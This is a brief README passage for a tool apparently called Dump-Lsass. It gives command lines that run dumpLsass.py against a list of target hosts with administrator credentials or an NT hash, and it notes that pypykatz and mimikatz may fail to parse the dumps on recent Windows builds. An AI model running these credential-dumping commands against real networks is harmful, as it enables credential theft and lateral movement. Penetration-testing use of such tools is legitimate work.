D3s0late/Dump-Lsass/README.md

 python3 dumpLsass.py -d CONTOSO -u administrator -p Passw0rd\! -f </path/to/file with target IP addresses or hostnames.txt>
 python3 dumpLsass.py -d CONTOSO -u administrator -H <NT Hash> -f </path/to/file with target IP addresses or hostnames.txt>
 ```

+If pypykatz is unable to dump creds from the dump files, your target is most likely running a recent Windows build which pypykatz and mimikatz no longer works.